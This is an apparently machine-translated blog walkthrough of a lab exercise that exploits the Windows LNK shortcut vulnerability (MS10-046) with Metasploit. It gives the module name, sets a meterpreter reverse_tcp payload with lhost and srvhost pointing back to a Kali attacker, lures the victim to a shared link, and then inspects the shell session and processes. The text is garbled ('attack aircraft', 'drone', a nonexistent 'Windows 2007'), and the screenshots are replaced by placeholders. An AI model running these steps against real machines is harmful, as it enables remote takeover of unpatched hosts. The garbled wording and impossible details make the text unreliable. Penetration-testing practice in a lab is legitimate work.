MSF penetration using the framework to achieve LNK file shortcut vulnerability offense and defense

MSF penetration using the framework to achieve LNK file shortcut vulnerability offense and defense

Experimental environment:
Attack: kali Linux
drone: Windows 2007 / Windows XP
1, open kali Linux, the command line to open msf:
Here Insert Picture Description
2 by search ms10-046 # inquiry vulnerability module
Here Insert Picture Description
3, through the use exploit / windows / browser / ms10_046_shortcut_icon_dllloader # enter the vulnerability module
Here Insert Picture Description
4, set the payload connection victim machine, bounce a connection back to Kali Linux:
the sET payload Windows / Meterpreter / reverse_tcp
Here Insert Picture Description
5, setting the attacker is kali Linux's ip and bounce connections back IP address:
the sET srvhost kali Linux the attackers set # ip ip
the sET lhost attack aircraft (since bounced back to their machines up) # set ip address bounce back, that kali Linux
other parameters default.

6, carry out an attack to generate a shared connection:
Here Insert Picture Description
7, shared copy down the link, so that access to the victim machine:
drone interface (2003 episode appears midway temporary replacement of 2007 but does not affect this experiment), there were two files
Here Insert Picture Description
attack aircraft At this point you can see the interface echo the information rebound: Here Insert Picture Description
8, according to the connection session -i # View conversation back can keep up with the numbers, assuming that view to keep up with a 1:
Here Insert Picture Description
we can also see it in the process according to this ps command:
Here Insert Picture Description
You can also call other command to get help command help, such as turning on the camera and the like, in view of the drone is not in a virtual machine so this demonstrates:
Here Insert Picture Description
Here Insert Picture Description
can enter the Windows shell by typing cmd computer users by name - Administrator can determine is super administrators can perform all commands Description:
Here Insert Picture Description

Released seven original articles · won praise 3 · Views 236

Guess you like

Origin blog.csdn.net/qq_41397071/article/details/104023697